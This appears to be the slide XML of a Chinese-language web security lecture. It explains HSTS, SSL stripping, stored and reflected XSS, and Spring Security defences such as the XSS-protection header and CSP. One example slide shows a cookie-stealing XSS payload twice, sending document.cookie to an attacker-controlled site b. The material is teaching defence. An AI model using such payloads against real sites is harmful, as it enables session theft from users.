                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="4540535" cy="1052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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>配置 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>HSTS</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2371770"/>
              <a:ext cx="4324636" cy="39187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当你进入银行网站，你输入可能输入网址：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>mybank.example.com  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</a:rPr>
                <a:t>或 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</a:rPr>
                <a:t>https://mybank.example.com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</a:rPr>
                <a:t>。如果你省略了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</a:rPr>
                <a:t>https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</a:rPr>
                <a:t>协议就可能受到中间人攻击。即使网站重定向到 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</a:rPr>
                <a:t>https</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>://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</a:rPr>
                <a:t>mybank.example.com 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</a:rPr>
                <a:t>也有可能遭到恶意用户拦截起初的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</a:rPr>
                <a:t>HTTP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</a:rPr>
                <a:t>请求并篡改响应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</a:rPr>
                <a:t>(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</a:rPr>
                <a:t>比如：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</a:rPr>
                <a:t>SSL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</a:rPr>
                <a:t>剥离攻击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</a:rPr>
                <a:t>)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</a:rPr>
                <a:t>。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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大多数用户都会省略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HTTPS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协议所以我们要采用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HSTS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保护。一旦 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</a:rPr>
                <a:t>mybank.example.com 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</a:rPr>
                <a:t>被添加为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</a:rPr>
                <a:t>HSTS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</a:rPr>
                <a:t>主机，浏览器可以知道任何来自 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</a:rPr>
                <a:t>mybank.example.com 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</a:rPr>
                <a:t>的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>请求都应该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</a:rPr>
                <a:t>转为 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</a:rPr>
                <a:t>https</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>://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</a:rPr>
                <a:t>mybank.example.com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</a:rPr>
                <a:t>。这样很大的降低了中间人攻击的可能性。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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标记网站为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HSTS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主机可以采用在响应中加上</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>“Strict-Transport-Security”</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>头</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>。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</a:rPr>
                <a:t>比如浏览器将如下域作为</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
                <a:t> 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</a:rPr>
                <a:t>HSTS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</a:rPr>
                <a:t>主机有效时限一年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</a:rPr>
                <a:t>(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</a:rPr>
                <a:t>即：总共</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>31536000 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>秒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</a:rPr>
                <a:t>)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</a:rPr>
                <a:t>。如图：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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r>
                <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>includeSubDomains</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>选项表示子域</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>比如：</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t> secure.mybank.example.com)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>也应将作为</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>HSTS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>域。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Spring 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Security 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默认是启用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HSTS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保护，也可以定制化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HSTS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头。配置如下：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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zh-CN" altLang="en-US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414" y="3605807"/>
            <a:ext cx="5590476" cy="3841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414" y="4619110"/>
            <a:ext cx="5133333" cy="204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554354"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="218548" y="1277256"/>
            <a:ext cx="5210628" cy="5432257"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="5210628" cy="5432257"/>
          </a:xfrm>
        </p:grpSpPr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xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="5134428" cy="661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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>XSS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Cross </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>SiteScript</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>）</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2551978"/>
              <a:ext cx="4934024" cy="47705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中文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名称：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跨站脚本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攻击。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为了</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" alt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</a:rPr>
                <a:t>不和层叠样式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表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</a:rPr>
                <a:t>(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Cascading Style Sheets, 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</a:rPr>
                <a:t>CSS)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的缩写混淆，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故缩写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为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</a:rPr>
                <a:t>XSS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。其原理是攻击者向有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XSS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漏洞的网站中输入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(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传入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)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恶意的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HTML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代码，当其它用户浏览该网站时，这段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HTML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代码会自动执行，从而达到攻击的目的。如，盗取用户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Cookie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、破坏页面结构、重定向到其它网站等。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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XSS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攻击分为：存储型和反射型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1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、存储型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XSS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：存储型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XSS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，持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，加入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。这种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XSS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比较危险，容易造成蠕虫，盗窃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cookie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（虽然还有种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DOM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型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XSS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，但是也还是包括在存储型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XSS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内）。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2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、反射型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XSS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：非持久化，需要欺骗用户自己去点击链接才能触发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XSS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代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US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AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5152572" y="1295113"/>
            <a:ext cx="6900562" cy="4693593"/>
            <a:chOff x="7478782" y="1890258"/>
            <a:chExt cx="4985657" cy="4693593"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54984" y="1890258"/>
              <a:ext cx="4540536" cy="661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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>相关攻击示例</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478782" y="2551978"/>
              <a:ext cx="4985657" cy="40318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1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、当我登录网站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a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后，我发现它的页面某些内容是根据</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>url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中的一个叫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content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参数直接显示的，猜测它的页面处理可能为：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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&lt;body&gt;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页面内容：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&lt;%=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>request.getParameter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("content")%&gt;&lt;/body&gt;</a:t>
              </a:r>
            </a:p>
            <a:p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同时我知道了某人的也注册了该网站，并且知道他的邮箱地址，于是做了一个超链接发给他，超链为：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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http://www.a.com?content=&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>window.open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(“www.b.com?param=”+</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>document.cookie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)&lt;/script&gt; </a:t>
              </a:r>
            </a:p>
            <a:p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当他点击超链接时，浏览器就会打开网站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b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，并把网站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a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中的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cookie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信息发送给网站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b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。网站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b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是由我搭建的，于是我就盗取了他在网站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a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的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cookie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信息。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cookie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里可能包含敏感信息。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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2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、比如网站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a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可以发表文章，我登录了网站发布了一遍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文章并保存，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文章中包含了恶意代码，比如：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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&lt;script&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>window.open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(“www.b.com?param=”+</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>document.cookie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)&lt;/script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</a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p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当他人查看这篇文章时就中招了，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</a:rPr>
                <a:t>cookie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信息将发送到网站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</a:rPr>
                <a:t>b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。我就可能窃取到他们的敏感信息。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs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1814123"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4238172" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4238172" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373258" y="1124504"/>
              <a:ext cx="3149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Web</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean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安全策略</a:t>
              </a:r>
              <a:endPara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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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2</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1023257" y="1183267"/>
            <a:ext cx="11023600" cy="5372886"/>
            <a:chOff x="7478783" y="1890258"/>
            <a:chExt cx="4616735" cy="4783907"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54983" y="1890258"/>
              <a:ext cx="4540535" cy="5060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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Spring Security </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>防范</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>XSS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>攻击</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478783" y="2371770"/>
              <a:ext cx="4324636" cy="43023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有些浏览器支持过滤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XSS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攻击，虽然不是万能但有助于防范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XSS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攻击。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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默认情况下，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XSS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过滤是开启的，添加相关头确保开启同时指示浏览器在检测到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XSS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攻击时如何处理。比如：浏览器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XSS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过滤器屏蔽内容显示而不是修复。这样添加如下头信息：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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r>
                <a:rPr lang="en-US" altLang="zh-CN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Spring Security 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配置如下：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CSP(Content Security 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</a:rPr>
                <a:t>Policy)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</a:rPr>
                <a:t>是一种保护机制，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</a:rPr>
                <a:t>web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</a:rPr>
                <a:t>应用可以利用它减轻内容注入漏洞，比如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</a:rPr>
                <a:t>XSS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</a:rPr>
                <a:t>攻击。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>通过</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CSP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>所约束的的规责指定可信的内容来源</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>比如：脚本、图片、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>iframe</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>等远程资源</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
